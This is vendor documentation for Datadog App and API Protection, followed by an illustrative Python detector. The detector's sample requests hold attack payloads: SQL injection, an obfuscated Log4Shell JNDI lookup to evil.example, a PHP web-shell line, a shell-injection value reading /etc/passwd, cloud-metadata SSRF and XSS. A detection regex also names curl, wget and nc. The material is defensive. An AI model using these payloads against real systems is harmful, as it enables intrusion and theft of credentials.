
Overview

Datadog App and API Protection provides observability into application-level attacks that aim to exploit code-level vulnerabilities or abuse the business logic of your application, and into any bad actors targeting your systems. It provides:

  • Observability into attacks: Provides insight into application-level attacks targeting code vulnerabilities or business logic.
  • Trace-based monitoring: Utilizes the same tracing libraries as Datadog APM to monitor traffic and detect security threats.
  • Security signals: Automatically generates security signals when attacks or business logic abuses are detected, focusing on meaningful threats rather than individual attempts.
  • Notification Options: Offers notifications through Slack, email, or PagerDuty based on security signal settings.
  • Embedded security: Integrated within the application, providing better threat identification and classification by accessing trace data.
  • Enhanced WAF functionality: Functions like a Web Application Firewall (WAF) but with additional application context, improving accuracy and reducing false positives.

Identify services exposed to application attacks

Datadog App and API Protection Threat Management uses the information APM is already collecting to flag traces containing attack attempts. While APM collects a sample of your application traffic, enabling App and API Protection in the tracing library is necessary to effectively monitor and protect your services.

Services exposed to application attacks are highlighted directly in the security views embedded in APM (Software Catalog, Service Page, Traces).

Datadog Threat Monitoring and Detection identifies bad actors by collecting client IP addresses, login account info (for example, user account/ID), and manually-added user tags on all requests.

1-Click Enablement
If your service is running with an Agent with Remote Configuration enabled and a tracing library version that supports it, you can enable App and API Protection from the Datadog UI without additional configuration of the Agent or tracing libraries.

Compatibility

For Datadog App and API Protection to be compatible with your Datadog configuration, you must have APM enabled and sending traces to Datadog. App and API Protection uses the same libraries used by APM, so you don’t need to deploy and maintain another library.

Steps to enable Datadog App and API Protection are specific to each runtime language. Check whether your language is supported in the App and API Protection prerequisites for each product.

Serverless monitoring

Datadog App and API Protection for AWS Lambda provides deep visibility into attackers targeting your functions. With distributed tracing providing a context-rich picture of the attack, you can assess the impact and remediate the threat effectively.

Read Enabling App and API Protection for Serverless for information on setting it up.

Performance

Datadog App and API Protection uses processes already contained in the Agent and APM, so there are negligible performance implications when using it.

When APM is enabled, the Datadog library generates distributed traces. Datadog App and API Protection flags security activity in traces by using known attack patterns. Correlation between the attack patterns and the execution context provided by the distributed trace triggers security signals based on detection rules.

A diagram illustrates that the Datadog tracer library operates at the application service level and sends traces to the Datadog backend. The Datadog backend flags actionable security signals and sends a notification to the relevant application, such as PagerDuty, Jira or Slack.

Data sampling and retention

In the tracing library, Datadog App and API Protection collects all traces that include security data. A default retention filter ensures the retention of all security-related traces in the Datadog platform.

Data for security traces is kept for 90 days. The underlying trace data is kept for 15 days.

Data privacy

By default, App and API Protection collects information from security traces to help you understand why the request was flagged as suspicious. Before sending the data, App and API Protection scans it for patterns and keywords that indicate that the data is sensitive. If the data is deemed sensitive, it is replaced with a <redacted> flag. This indicates that the request was suspicious, but that the request data could not be collected because of data security concerns.

Here are some examples of data that is flagged as sensitive by default:

  • pwd, password, ipassword, pass_phrase
  • secret
  • key, api_key, private_key, public_key
  • token
  • consumer_id, consumer_key, consumer_secret
  • sign, signed, signature
  • bearer
  • authorization
  • BEGIN PRIVATE KEY
  • ssh-rsa

To configure the information redacted by App and API Protection, refer to the data security configuration.

Threat detection methods

Datadog uses multiple pattern sources, including the OWASP ModSecurity Core Rule Set, to detect known threats and vulnerabilities in HTTP requests. When an HTTP request matches one of the out-of-the-box (OOTB) detection rules, a security signal is generated in Datadog.

Automatic Threat Patterns Updates: If your service is running with an Agent with Remote Configuration enabled and a tracing library version that supports it, the threat patterns used to monitor your service are automatically updated whenever Datadog publishes updates.

Security Signals are automatically created when Datadog detects meaningful attacks targeting your production services. They give you visibility into the attackers and the targeted services. You can set custom detection rules with thresholds to determine which attacks you want to be notified about.

Built-in protection

If your service is running with an Agent with Remote Configuration enabled and a tracing library version that supports it, you can block attacks and attackers from the Datadog UI without additional configuration of the Agent or tracing libraries.

ASM Protect goes beyond threat detection and takes blocking action to slow down attacks and attackers. Unlike a perimeter WAF, which applies its rules broadly when inspecting traffic, ASM uses the full context of your application (database, framework, programming language) to narrow inspection down to the most effective rules.

ASM uses the same tracing library as APM (Application Performance Monitoring) to protect your application from the following risks:

  • Attacks: ASM's in-app WAF inspects all incoming traffic, checks it against known patterns, and blocks malicious traffic (security traces).
  • Attackers: Based on insights collected by the library and flagged in Security Signals, it detects the IP addresses and authenticated users that launched attacks against your application.

Security traces are blocked in real time in the Datadog tracing library. Block decisions are stored in Datadog; the Datadog Agent securely and automatically fetches them, deploys them to your infrastructure, and applies them to your services. See How Remote Configuration works for details.

To use protection capabilities such as the in-app WAF, IP blocking, and user blocking, see Protection.

Attack attempt qualification

Leveraging distributed tracing information, attack attempts are qualified as safe, unknown, or harmful.

  • Attack attempts qualified as safe cannot breach your application, for example, when a PHP injection attack targets a service written in Java.
  • An unknown qualification is decided when there is not enough information to make a definitive judgement about the attack’s probability of success.
  • A harmful qualification is highlighted when there is evidence that a code level vulnerability has been found by the attacker.

Threat monitoring coverage

Datadog App and API Protection includes over 100 attack signatures that help protect against many different kinds of attacks, including, but not limited to, the following categories:

  • SQL injections
  • Code injections
  • Shell injections
  • NoSQL injections
  • Cross-Site Scripting (XSS)
  • Server-side Request Forgery (SSRF)

API security

API security is in Preview.

Datadog App and API Protection provides visibility into threats targeting your APIs. Use the Endpoints list in Software Catalog to monitor API health and performance metrics, where you can view attacks targeting your APIs. This view includes the attacker’s IP and authentication information, as well as request headers showing details about how the attack was formed. Using both App and API Protection and API management, you can maintain a comprehensive view of your API attack surface, and respond to mitigate threats.

How Datadog App and API Protection protects against Log4Shell

Datadog App and API Protection identifies Log4j Log4Shell attack payloads and provides visibility into vulnerable apps that attempt to remotely load malicious code. When used in tandem with the rest of Datadog’s Cloud SIEM, you can investigate to identify common post-exploitation activity, and proactively remediate potentially vulnerable Java web services acting as an attack vector.
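The following Python example is added to make the mechanism in the Threat detection methods, Threat monitoring coverage, Attack attempt qualification and Log4Shell sections above concrete. It is not Datadog's code: the rule ids and regexes are this example's own simplified signatures (not Datadog or OWASP CRS rules), and the requests and service runtimes are constructed. It shows a signature pass over the decoded request surface, a de-obfuscation step for nested Log4j lookups so that `${${lower:j}ndi:...}` is recognised as a Log4Shell probe, and the page's qualification rule: a match is safe when the payload can only affect a runtime the service (per its trace language tag) does not run, otherwise unknown. The harmful verdict requires evidence of exploitation from the trace, which request text alone cannot supply, so it is not derived here.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional
from urllib.parse import unquote_plus


@dataclass(frozen=True)
class Rule:
    """One illustrative signature. Ids and patterns are this example's own,
    not Datadog or OWASP CRS rule ids."""
    id: str
    category: str
    pattern: re.Pattern
    # Runtime the payload can only ever affect (None = cannot tell from payload).
    runtime: Optional[str] = None


RULES: List[Rule] = [
    Rule("sqli-union", "SQL injection",
         re.compile(r"(?i)\bunion\b[^\n]*\bselect\b|'\s*or\s+\S+\s*=")),
    Rule("xss-script", "Cross-Site Scripting (XSS)",
         re.compile(r"(?i)<\s*script\b|\bon\w+\s*=\s*[\"']")),
    Rule("shell-chain", "Shell injection",
         re.compile(r"(?:;|\|\||&&|\$\()\s*(?:cat|id|whoami|curl|wget|nc)\b")),
    Rule("nosql-op", "NoSQL injection", re.compile(r"\$(?:ne|gt|where|regex)\b")),
    Rule("ssrf-internal", "Server-side Request Forgery (SSRF)",
         re.compile(r"(?i)https?://(?:169\.254\.169\.254|localhost|127\.\d+\.\d+\.\d+)")),
    Rule("php-code", "Code injection", re.compile(r"(?i)<\?php\b|\bphp://"), runtime="php"),
    Rule("log4shell-jndi", "Log4Shell", re.compile(r"(?i)\$\{\s*jndi\s*:"), runtime="java"),
]

_LOOKUP = re.compile(r"\$\{([^{}]*)\}")


def collapse_lookups(text: str) -> str:
    """Resolve Log4j-style lookups nested inside another ${...} to the literal they
    evaluate to (${lower:j} -> j, ${::-n} -> n, ${env:X:-d} -> d), so that
    ${${lower:j}${::-n}di:ldap://...} is seen as ${jndi:ldap://...}. The outermost
    lookup is kept so the jndi: marker survives. Handles the common obfuscations
    only; it is not a full Log4j lookup evaluator."""
    while True:
        nested = None
        for m in _LOOKUP.finditer(text):
            before = text[: m.start()]
            if before.count("${") > before.count("}"):  # inside an open lookup
                nested = m
                break
        if nested is None:
            return text
        body = nested.group(1)
        literal = body.rsplit(":", 1)[-1].lstrip("-") if ":" in body else ""
        text = text[: nested.start()] + literal + text[nested.end():]


@dataclass
class Request:
    method: str
    path: str
    query: str = ""
    headers: Dict[str, str] = field(default_factory=dict)
    body: str = ""


def inspection_surface(req: Request) -> str:
    """Everything the in-app WAF looks at, URL-decoded and de-obfuscated."""
    parts = [unquote_plus(req.path), unquote_plus(req.query), unquote_plus(req.body)]
    parts += [f"{k}: {v}" for k, v in req.headers.items()]
    return collapse_lookups("\n".join(parts))


def detect(req: Request) -> List[Rule]:
    surface = inspection_surface(req)
    return [rule for rule in RULES if rule.pattern.search(surface)]


def qualify(matches: List[Rule], service_runtime: str) -> str:
    """safe: every matched payload targets a runtime this service does not run
    (the page's PHP-injection-against-Java example); otherwise unknown."""
    if not matches:
        return "none"
    if all(r.runtime is not None and r.runtime != service_runtime for r in matches):
        return "safe"
    return "unknown"


# (service runtime from the trace's language tag, request); all constructed.
SAMPLES = [
    ("java", Request("GET", "/search", "q=1%27+UNION+SELECT+password+FROM+users--")),
    ("java", Request("GET", "/login", headers={"User-Agent": "${${lower:j}${::-n}di:ldap://evil.example/a}"})),
    ("java", Request("POST", "/upload", body="<?php system($_GET['c']); ?>")),
    ("python", Request("GET", "/ping", "host=127.0.0.1%3Bcat+%2Fetc%2Fpasswd")),
    ("python", Request("GET", "/api/items", "filter%5B%24ne%5D=1")),
    ("node", Request("POST", "/comment", body="text=%3Cscript%3Ealert(1)%3C%2Fscript%3E")),
    ("node", Request("GET", "/fetch", "url=http%3A%2F%2F169.254.169.254%2Flatest%2Fmeta-data%2F")),
    ("node", Request("GET", "/healthz", headers={"User-Agent": "kube-probe/1.29"})),
]


def run_samples():
    """Return (path, matched categories, qualification) for each sample."""
    results = []
    for runtime, req in SAMPLES:
        matches = detect(req)
        results.append((req.path, [m.category for m in matches], qualify(matches, runtime)))
    return results


if __name__ == "__main__":
    for path, cats, verdict in run_samples():
        print(f"{path:<12} {verdict:<8} {', '.join(cats) or '-'}")
```

The PHP payload against the Java service is the page's own example of a safe qualification; the obfuscated JNDI probe against the same Java service stays unknown because the runtime matches and nothing in the request alone proves the lookup resolved. Note that the de-obfuscation runs before the signature pass: matching `${jndi:` on the raw header would miss the nested-lookup variants entirely.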